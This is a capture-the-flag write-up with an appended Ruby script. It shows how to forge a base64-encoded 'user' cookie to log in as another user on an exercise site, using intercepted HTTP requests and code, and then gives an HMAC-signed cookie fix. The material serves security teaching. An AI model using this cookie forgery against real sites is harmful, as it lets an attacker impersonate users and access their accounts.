Infosecinstitute | CTF2

Level 9 | A2 Broken Authentication and Session Management

It seems you were automatically logged in as John Doe. Try to find a way to be logged in as the user Mary Jane in order to see her profile.

Target:

Tools:

  • Firefox
  • BurpSuite

Intercept the request with BurpSuite; you'll find:

GET /ctf2/exercises/ex9.php HTTP/1.1
Host: ctf.infosecinstitute.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7v78334lr06v6j051f4epsj3e6; user=Sk9ITitET0U%3D
Connection: keep-alive

The user variable contains a base64 value. Decoding it with the BurpSuite decoder, or in Ruby with "Sk9ITitET0U=".unpack("m0"), gives us Sk9ITitET0U= = John+Doe. Now, to access as Mary Jane, we have to encode her name the same way, in Ruby ["Mary+Jane"].pack("m0"); the result is Mary+Jane = TWFyeStKYW5l.

Then change the Cookie header so the request becomes:

GET /ctf2/exercises/ex9.php HTTP/1.1
Host: ctf.infosecinstitute.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7v78334lr06v6j051f4epsj3e6; user=TWFyeStKYW5l
Connection: keep-alive

Then forward the request.

Done!
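As an added example (this is not the write-up's code nor anything from the CTF itself), the Ruby script below reproduces the decode/encode step from the walkthrough and then shows the minimal fix a developer would apply. The captured value is nothing more than base64 of the user name, so anyone can mint a cookie for another user; binding the name to an HMAC under a server-side secret makes a forged value detectable. SERVER_SECRET is a constructed placeholder, and the "base64.hmac" cookie layout is an assumed fix, not the exercise's real mechanism. Running it also shows that the captured cookie decodes to JOHN+DOE in upper case, and that Mary+Jane encodes to TWFyeStKYW5l as above.

```ruby
require 'base64'
require 'openssl'

# Cookie value captured from the intercepted request on the page.
# %3D is the URL-encoded '=' padding character of base64.
CAPTURED_USER_COOKIE = 'Sk9ITitET0U%3D'.freeze

# Undo the cookie's percent-encoding (only %XX escapes; '+' is left alone
# because the decoded name itself contains a literal '+').
def percent_decode(value)
  value.gsub(/%([0-9A-Fa-f]{2})/) { Regexp.last_match(1).hex.chr }
end

# What the exercise's server effectively does with the cookie: base64-decode it
# and trust the result as the logged-in user. "m0" is Ruby's strict, newline-free base64.
def decode_user_cookie(value)
  percent_decode(value).unpack1('m0')
end

# Build a cookie for any name the same way; this is the whole "attack" in the exercise.
def encode_user_cookie(name)
  [name].pack('m0')
end

# ---- Hardened variant (assumed fix, not from the page) ----
# The weakness is that identity lives client-side with no integrity check.
# An HMAC under a server-side secret binds the name to something the client cannot forge.
SERVER_SECRET = 'constructed-demo-secret'.freeze

def sign_user_cookie(name, secret = SERVER_SECRET)
  tag = OpenSSL::HMAC.hexdigest('SHA256', secret, name)
  "#{[name].pack('m0')}.#{tag}"
end

# Compare two strings without leaking the position of the first mismatch.
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize

  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Returns the user name only when the tag verifies; nil for anything else
# (missing tag, bad base64, wrong secret, tampered name).
def verify_user_cookie(value, secret = SERVER_SECRET)
  encoded, tag = value.to_s.split('.', 2)
  return nil if encoded.nil? || tag.nil?

  name = begin
    Base64.strict_decode64(encoded)
  rescue ArgumentError
    return nil
  end
  expected = OpenSSL::HMAC.hexdigest('SHA256', secret, name)
  constant_time_equal?(tag, expected) ? name : nil
end

if __FILE__ == $PROGRAM_NAME
  puts "captured cookie decodes to: #{decode_user_cookie(CAPTURED_USER_COOKIE)}"
  forged = encode_user_cookie('Mary+Jane')
  puts "cookie for Mary Jane: #{forged}"
  puts "unsigned scheme accepts it? #{decode_user_cookie(forged) == 'Mary+Jane'}"
  puts "signed scheme accepts it with a guessed tag? #{!verify_user_cookie("#{forged}.0000").nil?}"
  puts "legitimately signed cookie verifies as: #{verify_user_cookie(sign_user_cookie('Mary+Jane'))}"
end
```

The signed variant is still a client-held identity claim; a server-side session keyed by an opaque random identifier (which is what PHPSESSID is meant to provide) avoids trusting client data altogether, and the HMAC shown here is simply the smallest change that closes this particular hole.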